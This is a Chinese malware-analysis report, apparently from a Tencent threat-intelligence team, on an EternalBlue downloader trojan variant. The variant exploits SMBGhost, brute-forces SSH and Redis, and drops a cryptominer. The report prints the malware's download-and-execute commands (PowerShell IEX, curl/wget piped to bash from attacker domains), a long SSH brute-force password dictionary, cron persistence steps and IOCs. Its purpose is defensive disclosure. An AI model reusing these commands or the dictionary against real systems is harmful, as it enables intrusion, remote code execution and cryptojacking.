“黑球”行动再升级,SMBGhost 漏洞攻击进入实战
- 浏览次数 113149
- 喜欢 0
感谢腾讯御见威胁情报中心来稿!
原文链接:https://mp.weixin.qq.com/s/ZoiKCTEaxhXIXsI4OzhWvA
一、概述
2020年6月10日,腾讯安全威胁情报中心检测到永恒之蓝下载器木马出现变种。此次变种在上个版本“黑球”行动中检测SMBGhost漏洞的基础上首次启用SMBGhost漏洞攻击,之前的若干种病毒只是利用SMBGhost漏洞做扫描检测,并无实质性攻击利用。本次更新还启用了SSH爆破以及新增Redis爆破能力攻击Linux系统。
由于SMBGhost漏洞CVE-2020-0796利用Windows SMB漏洞远程攻击获取系统最高权限,可直接攻击SMB服务造成RCE(远程代码执行),存在漏洞的计算机只要联网就可能被黑客探测攻击,并获得系统最高权限。该攻击行动使得“永恒之蓝”系列木马针对Windows系统的攻击能力再次增强。
腾讯安全威胁情报中心曾多次发布SMBGhost漏洞风险提示,至今仍有近三分之一的系统未修补该漏洞,我们再次强烈建议所有用户尽快修补SMBGhost漏洞(CVE-2020-0796)。
此外永恒之蓝下载器木马还新增了针对Linux系统的远程攻击,在失陷系统创建定时任务并植入挖矿木马功能,使得其攻击的范围继续扩大,包括云上Linux主机等都可能成为攻击目标。永恒之蓝本次更新的主要目的是释放挖矿木马,并会按照惯例在开始挖矿前,清除其他挖矿木马,以便独占系统资源。挖矿活动会大量消耗企业服务器资源,使正常业务受严重影响。
二、样本分析
攻击模块if.bin在smbghost_exec函数中利用从hxxp://d.ackng.com/smgh.bin下载的SMBGhost漏洞攻击程序发起攻击,攻击成功后远程执行以下shellcode:
powershell IEx(New-Object Net.WebClient).DownLoadString(''http[:]///t.amynx.com/smgho.jsp?0.8*%computername%'')
针对Linux系统服务器的攻击
1、利用SSH爆破
扫描22端口进行探测,针对Linux系统root用户,尝试利用弱密码进行爆破连接,爆破使用密码字典:
"saadmin","123456","test1","zinch","g_czechout","asdf","Aa123456.","dubsmash","password","PASSWORD","123.com","admin@123","Aa123456","qwer12345","Huawei@123","123@abc","golden","123!@#qwe","1qaz@WSX","Ab123","1qaz!QAZ","Admin123","Administrator","Abc123","Admin@123","999999","Passw0rd","123qwe!@#","football","welcome","1","12","21","123","321","1234","12345","123123","123321","111111","654321","666666","121212","000000","222222","888888","1111","555555","1234567","12345678","123456789","987654321","admin","abc123","abcd1234","abcd@1234","abc@123","p@ssword","P@ssword","p@ssw0rd","P@ssw0rd","P@SSWORD","P@SSW0RD","P@w0rd","P@word","iloveyou","monkey","login","passw0rd","master","hello","qazwsx","password1","Password1","qwerty","baseball","qwertyuiop","superman","1qaz2wsx","fuckyou","123qwe","zxcvbn","pass","aaaaaa","love","administrator","qwe1234A","qwe1234a"," ","123123123","1234567890","88888888","111111111","112233","a123456","123456a","5201314","1q2w3e4r","qwe123","a123456789","123456789a","dragon","sunshine","princess","!@#$%^&*","charlie","aa123456","homelesspa","1q2w3e4r5t","sa","sasa","sa123","sql2005","sa2008","abc","abcdefg","sapassword","Aa12345678","ABCabc123","sqlpassword","sql2008","11223344","admin888","qwe1234","A123456","OPERADOR","Password123","test123","NULL","user","test","Password01","stagiaire","demo","scan","P@ssw0rd123","xerox","compta"
爆破登陆成功后执行远程命令:
`Src=ssho;(curl -fsSL http[:]//t.amynx.com/ln/core.png?0.8*ssho*`whoami`*`hostname`||wget -q -O- http[:]//t.amynx.com/ln/core.png?0.8*ssho*`whoami`*`hostname`) | bash`
2、利用Redis未授权访问漏洞
扫描6379端口进行探测,在函数redisexec中尝试连接未设置密码的redis服务器,访问成功后执行远程命令:
`export src=rdso;curl -fsSL t.amynx.com/ln/core.png?rdso|bash`
SSH爆破和Redis爆破登陆成功均会执行Linux Shell脚本core.png,该脚本主要有以下功能:
a.创建crontab定时任务下载和执行脚本http[:]//t.amynx.com/ln/a.asp
b.创建crontab定时启动Linux平台挖矿木马/.Xll/xr
通过定时任务执行的a.asp首先会清除竞品挖矿木马:
然后通过获取/root/.sshown_hosts中记录的本机SSH登陆过的IP,重新与该机器建立连接进行内网扩散攻击:
创建目录/.Xll并下载挖矿木马(d[.]ackng.com/ln/xr.zip)到该目录下,解压得到xr并连接矿池lplp.ackng.com:444启动挖矿。
永恒之蓝下载器木马自2018年底诞生以来一直处于高度活跃状态,目前该木马会通过以下方法进行扩散传播:
截止2020年6月12日,永恒之蓝木马下载器家族主要版本更新列表如下:
IOCs
Domain
t.amynx.com
t.zer9g.com
t.zz3r0.com
d.ackng.com
URL
http[:]//t.amynx.com/smgh.jsp
http[:]//t.amynx.com/a.jsp
http[:]//t.amynx.com/ln/a.asp
http[:]//t.amynx.com/ln/core.png
http[:]//d.ackng.com/if.bin
http[:]//d.ackng.com/smgh.bin
http[:]//d.ackng.com/ln/xr.zip
